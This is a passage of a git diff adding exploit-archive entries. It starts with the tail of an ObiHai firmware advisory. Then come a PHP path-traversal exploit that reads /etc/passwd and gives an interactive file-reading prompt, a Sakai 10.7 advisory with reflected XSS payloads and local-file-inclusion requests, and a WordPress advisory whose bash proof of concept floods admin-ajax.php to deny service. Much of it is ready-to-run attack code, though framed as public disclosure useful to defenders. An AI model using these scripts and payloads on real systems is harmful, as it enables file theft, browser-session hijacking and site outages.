4294967295 + +Mitigation +========== +Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer. + +Author +====== +The issues were discovered by David Tomaschik of the Google Security Team. + +Timeline +======== +- 2016/05/12 - Reported to ObiHai +- 2016/05/12 - Findings Acknowledged by ObiHai +- 2016/05/20 - ObiHai reports working on patches for most issues +- 2016/06/?? - New Firmware posted to ObiHai Website +- 2016/08/18 - Public Disclosure \ No newline at end of file diff --git a/platforms/hardware/webapps/40284.txt b/platforms/hardware/webapps/40284.txt new file mode 100755 index 000000000..4eabc28cc --- /dev/null +++ b/platforms/hardware/webapps/40284.txt @@ -0,0 +1,63 @@ + "cli") + die($error[0]); + +if($argc < 3) { + echo("\nUsage : php {$argv[0]} "); + echo("\nExample: php {$argv[0]} localhost 8080"); + die(); +} + +if(isset($argv[1]) && isset($argv[2])) { + $host = $argv[1]; + $port = $argv[2]; +} + +$pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{FILE_PATH} HTTP/1.0\r\n"; +$pack.= "Host: {$host}\r\n"; +$pack.= "Connection: close\r\n\r\n"; + +while(1) { + if(strstr(http_send($host, $port, preg_replace("/{FILE_PATH}/", '/etc/passwd', $pack)), 'root')) { + echo("\nAnonymous@{$host}:~# cat "); + if(($file = trim(fgets(STDIN))) == "exit") + break; + $ret = http_send($host, $port, preg_replace("/{FILE_PATH}/", $file, $pack)); + if(strstr($ret, 'Error 404 NOT_FOUND') || strstr($ret, '

Problem accessing') || strstr($ret, '

HTTP ERROR 404

')) { + echo("cat: {$file}: No such file or directory"); + } else { + echo($ret); + } + } else { + echo("[-] Server likely not vulnerable.\n"); + break; + } +} + +function http_send($host, $port, $pack) { + if(!($sock = fsockopen($host, $port))) + die("\n[-] No response from {$host}\n"); + fwrite($sock, $pack); + $response = explode("\r\n\r\n", stream_get_contents($sock)); + return($response[1]); +} +?> \ No newline at end of file diff --git a/platforms/java/webapps/40286.txt b/platforms/java/webapps/40286.txt new file mode 100755 index 000000000..6741f2ffb --- /dev/null +++ b/platforms/java/webapps/40286.txt @@ -0,0 +1,107 @@ +Sakai 10.7 Multiple Vulnerabilities + + +Vendor: Apereo Foundation +Product web page: https://www.sakaiproject.org +Affected version: 10.7 (Kernel 10.7) + +Summary: Sakai is a free, community source, educational software +platform designed to support teaching, research and collaboration. +Systems of this type are also known as Course Management Systems (CMS), +Learning Management Systems (LMS), or Virtual Learning Environments (VLE). + +Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities +when input passed via several parameters to several scripts is not properly +sanitized before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context of an +affected site. Also there is a file disclosure vulnerability when calling +custom tool script. It is not properly verified before being used to read files. +This can be exploited to disclose contents of files from local resources. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5358 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php + +Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param) + https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job) + https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI) + https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools) + + + +29.06.2016 + +-- + + +XSS when using file upload (filename parameter): +------------------------------------------------ + +POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1 +Host: localhost:8080 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Connection: close + +------WebKitFormBoundaryViazQNB5ok9E64l2 +Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo" +Content-Type: application/octet-stream + +testingus +------WebKitFormBoundaryViazQNB5ok9E64l2-- + + +Response: + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +X-UA-Compatible: IE=EmulateIE11 +Cache-Control: no-cache +Content-Type: text/html;charset=UTF-8 +Content-Length: 383 +Date: Wed, 29 Jun 2016 11:45:49 GMT +Connection: close + + + + + + +XSS when creating a job (After creating a job, click on "Triggers" link): +------------------------------------------------------------------------- + +GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1 +Host: localhost:8080 + + + +XSS in URI: +----------- + +GET /access/basiclti/site/~admin/axxm4j HTTP/1.1 +Host: localhost:8080 + + +LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics. +Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting: +/portal/tool/[TOOL_ID]/WEB-INF/web.xml): +---------------------------------------- + +GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1 +Host: localhost:8080 + diff --git a/platforms/php/webapps/40288.txt b/platforms/php/webapps/40288.txt new file mode 100755 index 000000000..ebb99f763 --- /dev/null +++ b/platforms/php/webapps/40288.txt @@ -0,0 +1,70 @@ +Path traversal vulnerability in WordPress Core Ajax handlers + +Abstract + +A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. + +Contact + +For feedback or questions about this advisory mail us at sumofpwn at securify.nl + +The Summer of Pwnage + +This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. + +OVE ID + +OVE-20160712-0036 + +See also + +- CVE-2016-6896 +- CVE-2016-6897 +- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin() + +Tested versions + +This issue was successfully tested on the WordPress version 4.5.3. + +Fix + +WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s). + +Introduction + +WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. + +Details + +The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). + +The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers. + +Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case. + +Proof of concept + +The following Bash script can be used to trigger the denial of service condition. + +#!/bin/bash +target="http://" +username="subscriber" +password="password" +cookiejar=$(mktemp) + +# login +curl --cookie-jar "$cookiejar" \ + --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ + "$target/wp-login.php" \ + >/dev/null 2>&1 + +# exhaust apache +for i in `seq 1 1000` + do + curl --cookie "$cookiejar" \ + --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ + "$target/wp-admin/admin-ajax.php" \ + >/dev/null 2>&1 & +done + +rm "$cookiejar" \ No newline at end of file